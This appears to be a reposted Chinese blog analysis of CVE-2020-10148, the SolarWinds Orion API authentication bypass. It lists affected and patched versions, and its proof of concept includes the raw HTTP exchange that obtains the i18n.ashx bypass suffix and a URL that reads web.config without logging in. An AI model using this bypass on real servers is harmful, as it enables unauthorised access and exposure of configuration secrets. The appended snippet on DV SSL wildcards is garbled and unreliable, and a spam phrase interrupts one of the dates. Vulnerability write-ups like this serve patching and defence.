SolarWinds Orion API 远程代码执行漏洞CVE-2020-10148的分析是什么样的

这篇文章给大家介绍SolarWinds Orion API 远程代码执行漏洞CVE-2020-10148的分析是什么样的，内容非常详细，感兴趣的小伙伴们可以参考借鉴，希望对大家能有所帮助。SolarWinds Orion API 远程代码执行漏洞（CVE-2020-10148）SolarWinds Orion API 嵌入在 Orion Core 中，被用于与所有 SolarWinds Orion Platform 产品进行接口。通过在URI请求的Request.PathInfo 部分中包含特定参数，可以绕过 API 身份验证，这可能允许攻击者执行未经身份验证的 API 命令。如果攻击者将WebResource.adx，scriptResource.adx，i18n.ashx 或 Skipi18n 的 PathInfo 参数附加到对 SolarWinds Orion 服务器的请求，SolarWinds 可能会设置 SkipAuthorization 标志，该标志可能允许处理API请求无需身份验证。攻击者可利用该漏洞远程执行任意代码，有专业黑客组织利用该漏洞投递代号为’SUPERNOVA’的恶意程序。影响版本：SolarWinds Orion 2020.2.1 HF 2 及 2019.4 HF 6之前的版本安全版本：SolarWinds Orion 2019.4 HF 6（2020年12月14日发布）SolarWinds Orion 2020.2.1 HF 2（发布于2020年12月15日）SolarWinds Orion 2019.2 SUPERNOVA补丁（2020年12月23日发布）SolarWinds Orion 2018.4 SUPERNOVA补丁（2020年12月23免费云主机域名日发布）SolarWinds Orion 2018.2 SUPERNOVA补丁（2020年12月23日发布）访问/Orion/invalid.aspx.js 路径，截取请求头中Location中data获取Location:/Orion/invalid.aspx.js.i18n.ashx?l=en-us&v=43005.14.LGET/Orion/invalid.aspx.jsHTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0Accept: text/css,*/*;q=0.1Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeReferer: http://127.0.0.1/Orion/Login.aspx?ReturnUrl=%2fCookie: ASP.NET_SessionId=p5yxzzumyllsfprttbkexo4u; TestCookieSupport=Supported; Orion_IsSessionExp=TRUEresponseHTTP/1.1404Not FoundCache-Control: no-cachePragma: no-cacheExpires: -1Location: /Orion/invalid.aspx.js.i18n.ashx?l=en-us&v=43005.14.LServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Same-Domain: 1X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockDate: Wed, 30 Dec 2020 01:55:43 GMTConnection: closeContent-Length: 0将 .i18n.ashx?l=en-US&v=43005.14.L携带到下个访问路径，从而绕过身份认证。这里访问的是 web.config文件。直接访问也行：http://127.0.0.1/web.config.i18n.ashx?l=en-us&v=43005.14.L关于SolarWinds Orion API 远程代码执行漏洞CVE-2020-10148的分析是什么样的就分享到这里了，希望以上内容可以对大家有一定的帮助，可以学到更多知识。如果觉得文章不错，可以把它分享出去让更多的人看到。

相关推荐: DV ssl证书没通配符是什么意思？

证书分为三个类型，这这三个类型都会出现在你公司的企业问题上面，还有就是你的资本是否足够来申请，该ssl证书，那么来说一下DV ssl证书没通配符什么意思？通配符指的就是该是否有安全性克制，或者就是会不会为该网站建立一种安全的屏障，使得该公司全度大大提升。那么通…